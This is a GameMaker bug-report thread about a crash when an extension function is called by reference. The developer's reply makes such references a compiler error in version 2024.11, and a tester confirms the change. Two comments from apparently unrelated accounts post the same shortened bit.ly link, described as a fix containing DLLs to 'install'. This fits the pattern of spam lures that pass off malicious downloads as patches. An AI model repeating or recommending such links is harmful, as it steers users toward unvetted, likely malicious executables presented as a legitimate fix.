### ISSUE TITLE
In-Game: Calling an extension function via a reference causes a crash

### ISSUE THREAD

**Issue by DiasFranciscoA** [YoYoGames/GameMaker-Bugs#7702]
### Description

when using an extension function refence instead of directly calling it this results in a crash at runtime.

![image](https://github.com/user-attachments/assets/1ba40d68-678e-4f54-8e79-2d91d415fa26)

[ext_func_ref.zip](https://github.com/user-attachments/files/17058375/ext_func_ref.zip)

### Steps To Reproduce

1. Start GameMaker
2. Run the game
3. See the issue

### How reliably can you recreate this issue using your steps above?

Always

### Which version of GameMaker are you reporting this issue for?

2024.8.0 (Monthly), 2024.800 (Betas)

### Which platform(s) are you seeing the problem on?

Windows

### Sample Package Attached?

- [X] I have attached my bug package

### Sample Project Added?

- [X] I have included a small sample project

**Comment by AmjedKhaled165** [comment]
This might help:This file might fix it

https://bit.ly/4eugCty
I put the necessary dlls in the archive

**Comment by Buqra55** [comment]
install this

https://bit.ly/4eugCty

you may need to install the c compiler

**Comment by rwkay** [comment]
OK this is tricky as we currently have no way of doing an indirect call to an extension function in this way... 

Ideally we would generate a script function that took the same number of arguments and immediately called the extension function... and then the indirect call actually called this generated function...

This is not something we currently support... Until we have a use case for it... I am going to put it into the backlog (it would be around a weeks worth of work to implement, and no users are asking for it).

**Comment by rwkay** [comment]
After internal discussion I decided to make it an error to take an indirect reference to an extension function, if this is a problem going forward then raise an issue with it..

Error message will now be emitted in the compiler when code like this is used.

```
a = [
	Extension1_Function1,
	Extension1_Function2
]
```

Addressed in 2024.11

**Comment by Emc1923** [comment]
Verified compiler error in  IDE v2024.1100.0.644  Runtime v2024.1100.0.665.
